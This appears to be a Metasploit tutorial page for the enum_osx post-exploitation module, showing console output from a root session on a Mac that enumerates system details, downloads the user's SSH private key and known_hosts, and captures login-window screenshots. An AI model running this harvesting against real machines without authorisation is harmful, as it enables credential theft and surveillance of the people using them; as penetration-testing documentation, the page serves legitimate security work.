enum_osx
The enum_osx post module gathers basic system information from Mac OS X Tiger, Leopard, Snow Leopard and Lion systems.
msf > use post/osx/gather/enum_osx msf post(enum_osx) > run [*] Running module against Victim.local [*] This session is running as root! [*] Saving all data to /root/.msf4/logs/post/enum_osx/Victim.local_20120926.3521 [*] Enumerating OS [*] Enumerating Network [*] Enumerating Bluetooth [*] Enumerating Ethernet [*] Enumerating Printers [*] Enumerating USB [*] Enumerating Airport [*] Enumerating Firewall [*] Enumerating Known Networks [*] Enumerating Applications [*] Enumerating Development Tools [*] Enumerating Frameworks [*] Enumerating Logs [*] Enumerating Preference Panes [*] Enumerating StartUp [*] Enumerating TCP Connections [*] Enumerating UDP Connections [*] Enumerating Environment Variables [*] Enumerating Last Boottime [*] Enumerating Current Activity [*] Enumerating Process List [*] Enumerating Users [*] Enumerating Groups [*] .ssh Folder is present for Victim [*] Downloading id_dsa [*] Downloading known_hosts [*] .gnupg Folder is present for Victim [*] Downloading ls: /Users/Victim/.gnupg: No such file or directory [*] Capturing screenshot [*] Capturing screenshot for each loginwindow process since privilege is root [*] Capturing for PID:2508 ...snip... [*] Post module execution completed
root@kali:~/.msf4/logs/post/enum_osx/RJLAP4.local_20120926.3521# ls
Airport.txt Firewall.txt OS.txt TCP Connections.txt
Applications.txt Frameworks.txt OS X Gather Mac OS X System Information Enumeration UDP Connections.txt
Bluetooth.txt Groups.txt Preference Panes.txt USB.txt
Current Activity.txt Known Networks.txt Printers.txt Users.txt
Development Tools.txt Last Boottime.txt Process List.txt
Environment Variables.txt Logs.txt screenshot_2058.jpg
Ethernet.txt Network.txt StartUp.txt
root@kali:~/.msf4/logs/post/enum_osx/Victim.local_20120926.3521# more Firewall.txt
Firewall:
Firewall Settings:
Mode: Block all incoming connections
Firewall Logging: Yes
Stealth Mode: Yes
root@kali:~/.msf4/logs/post/enum_osx/Victim.local_20120926.3521# more OS.txt
Software:
System Software Overview:
System Version: Mac OS X 10.7.4 (11E53)
Kernel Version: Darwin 11.4.0
Boot Volume: Macintosh HD
Boot Mode: Normal
Computer Name: Victim
User Name: System Administrator (root)
Secure Virtual Memory: Enabled
64-bit Kernel and Extensions: Yes
Time since boot: 12:13